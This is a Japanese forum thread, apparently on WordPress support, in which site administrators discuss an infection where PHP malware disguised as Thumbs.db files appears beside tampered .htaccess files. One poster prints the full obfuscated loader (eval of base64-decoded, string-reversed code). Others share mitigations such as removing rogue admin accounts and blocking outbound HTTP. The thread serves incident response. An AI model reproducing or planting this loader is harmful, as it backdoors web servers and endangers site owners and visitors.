追記
前回のThumbs.dbが8月24日
すべての、thumbs.dbを削除したはずでしたが
-rw----rw- 1 name hpusers 2035 2011-09-03 03:05 ./public_html/site.url/wp-content/.htaccess
-rw----r-- 1 name hpusers 315 2011-09-05 16:11 ./public_html/directory/wp-content/wp-dbmanager/.htaccess
-rwx---rwx 1 name hpusers 4120 2011-09-03 03:04 ./public_html/directory/wp-content/wp-dbmanager/Thumbs.db
-rwx---rwx 1 name hpusers 4120 2011-09-03 03:05 ./public_html/site.url/wp-content/blogs.dir/Thumbs.db
新しい場所を見つけて、設置するという執着はどこから来るのだろうか
.htaccessが606は、書き換えていくけれど、604は書き換えていかない。(phpはアパッチモジュール)
当方が管理するサーバーでも同様の事象が起こっています。マルウェアとおっしゃっているPHPコード(Thumbs.db)は以下の様な内容でしょうか?
—————————————————————-
<?php
@eval(base64_decode(“aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU1NjkzKSB7ZnVuY3Rpb24gZXZhbHFLcVFJWmpRbXZIKCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9c1RLd2d5WnVsR2R5OUdjbEozWHk5bWN5VkdRIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9QVNmN2tTVFVOSFpDVm1hR3hrVGl4MlFzRm1kbFJDS2xSMmJqVkdaZlJqTmxOWFlpQmlieVZIZGxKM2Vna1NUVU5IWkNWbWFHeGtUaXgyUXNGbWRsUkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnNDJicFIzWXVWbloiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5VWtNWkpDSzFsWFNsTlhUQmxXU0tORmJoWlhaZzBESTNaWFVCWm5VSlYwZDBoMmNNeG1RbXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5MEVTa2htVXpNbUlvVVhlSlYyY05GVWFKcDBVc0ZtZGwxelREZG5ZR2hIWjFkR1ZDVkhSaXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09wSVNQOUUwWXdJRlNoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFo5NFVaVkZXUjFwbFpPVjBZTXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj1zVEtpMEROWEZtSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDFqVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiPXNUS2kwVFBSbGtka2RWU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZXUGh4a1p4ZDJaaEJGYTZkSFZ3UkdTUHhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09kbGlJVlZUVlNoa1J3ZzFVV0JUVldsalJWVmxVR05sSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazBUZFlwM1lKVlVlUWRWUUZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI3a1NLaTBUUG5OR2I0MVdXMFpVYlZKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWmd3U0tpUWpWSHBWZEdkMVZpZ1NkNWxVWnoxVVFwbGtTVHhXWTJWR0lza2lJOWtFV2FKRGJIRm1hS2hWV21aMFZoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnd1NLaUFUT3RGMVRPWkZWaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdJc2tpSTlFa2JqRkRleVVsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbEJDTHBJQ2I0SmpXMmxqTVNKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWm9rWFl5SlhZZzBESXlwMmRJeFVheWwwVkNwMFN0eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2NuZFJGa2RTbFVSM1JIYXp4RWJDWkdiaFpYWmswakxXOTBRdFptVVRWa1JoWkVhSU5VWXNwSGJoWlhaa0FTS2dzeUtwUkNJN2tESTl3RElwUkNJN0FESTlBU2FrZ0NJeTltWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2tTS2kwVFBSWjJOcmwzWXJkV2VqQlROWHBGTTFJallxbGpSa3hHWnlnRmI0ZFZZdEpVUkpWblNZUkdNVzEyWTNJMFVMcG5VRHQwVFdoMVlWQkhNWmhtUkdkbFJzQmpZUmx6UmlobVdZcDFaMElqWXdKMU1aVm5WdXBsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdjbmRSRmtkU2xVUjNSSGF6eEViQ1pHYmhaWFprNGlJdUlTUHVBaVZQTlVibUoxVUZaVVlHaEdTREZHYjZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9PVFmOXRqYVh4MGNRSjBTNXhXVHNGbWRsUkNJdmgyWWx0VFh4c2xhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k5QWlhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k3a2lhWHgwY1FKMFM1eFdUc0ZtZGxSQ0xoeGtaeGQyWmhCRmE2ZEhWd1JHU1B4V1kyVkdKb1VHWnZ4R2M0VkdJOUFpYVh4MGNRSjBTNXhXVHNGbWRsUnllcGtTWU1aV2NuZFdZUWhtZTNSRmNraDBUc0ZtZGxSQ0xxZEZUekJsUUxsSGJOeFdZMlZHSm9JSGR6SkhkemhDSW1sMk9wa1NYcElTVk9GRFZKbGpSVlZsVUdObElvVVhlSlYyY05GVWFKcDBVc0ZtZGx0bFVGWmxVRk4xWGtnU1prOTJZdVZHYnlWbkxwSVNPbjFtU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBVSFc2TldTRmxIVVhGVVJzRm1kbFJDS2xSMmJqNVdac0pYZHVraUk1a1ViS0pDSzFsWFNsTlhUQmxXU0tORmJoWlhadTBWS2kwVFNHSlZSR0JEV0dKVk1VNWtWclZsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazRTS2kwRE1VRm1Jb1VYZUpWMmNORlVhSnAwVXNGbWRsNVNLaTBET0VObUlvVVhlSlYyY05GVWFKcDBVc0ZtZGw1U0tpOG1RdXhrSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDVpVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSnVraUk5MHpkTUpDSzFsWFNsTlhUQmxXU0tORmJoWlhadVkxVEQxbVpTTlZSR0ZtUm9oMFFoeG1lc0ZtZGxSaUxwSVNQNGtIVGlnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBJU1A5YzJUaWdTZDVsVVp6MVVRcGxrU1R4V1kyVm1MT1ZXVmhWVWRhWm1URk5HVHNGbWRsUkNLT1ZYY1VwMFloRkZXRmwwYlE5R2JoWlhaZzBESXFkRlR6QmxRTGxIYk54V1kyVkdKZ3NUS3dBRE93RXpLcGdTWnRsR2Rza1NLaTBUVElSR2FTTnpZaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdLMVFXYnM4MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSQ0tsbDJhdjkyWTBWMmNBQnllZ1UyY3NWR0k5dEhJcGtTS2Q5MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSeVdGbDBTUDkwUWZSQ0swVjJjemxHS2dJM2Jna1NLMWhsZWpsVVI1QjFWQlZFYmhaWFprQUNMaWsyTGlBaUxna2ljcWRIU01sbWNKZGxRS3RVYnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbGJzZnJtYkd2WlhERiA9NTU2OTM7fQ==”)); ?>
—————————————————————-
いまだ、解決策はなく、とりあえず、サイト内に存在するすべてのThumbs.db を削除し、運用しています。また、.htaccessが勝手に改ざんされ、サイト閲覧ができなくなってしまいますので、.htaccessの属性を’404’で書き換え不可にしてあります(邪道かも知れませんが…)。なにか良い対応策がありましたら、アドバイスをお願いします。
こんにちは
同じものだと思います。
コードは base64_encodeとstrrevを使って難読化しているようです。
念のため、ユーザーをチェックしてみたほうがいいかもしれません。
チェックの過程で、管理者でないadmin(自分が作ったものかどうか不明)を見つけましたので、削除しておきましたが、(その後またやられていますけど)
wp-config.phpに以下の定数を設定して様子見ています。
(使い方正しいのかどうかも、よくわかっていないのですが、、、)
define('WP_HTTP_BLOCK_EXTERNAL', true);
define('WP_ACCESSIBLE_HOSTS', 'wordpress.org');
一つ質問があります。
.htaccessは、サイトルートにあるものが改変されましたか?
nobitaさん、こんにちは。
ご質問の件ですが…、
改変された.htaccessは、サイトルートはじめ、その下位フォルダー内の
もの12本が改変されていました。すべて同じタイムスタンプなのですが、
問題の.htaccessの最終行に書かれているパスは、各々の該当のパスが
書き込まれています。また、同じ位置に、マルウェアコードが実装された
Thumbs.dbも存在していました(タイムスタンプは.htaccessと同じです)。
自社内の全PCで、Thumbs.dbのチェックを実施し、問題ない事を確認しま
したので、自社PCからアップされたとは考えづらいです。
今回、問題となっているサイトフォルダーは、いずれも、PHPの開発ベンダー
が担当する場所ですので、ベンダー所有PCが怪しいのかな?と思っていますが、
確証を得るまでは…と、様子見状態です。
情報を共有できる方がいらして大変助かっています。引き続きよろしく
お願いします。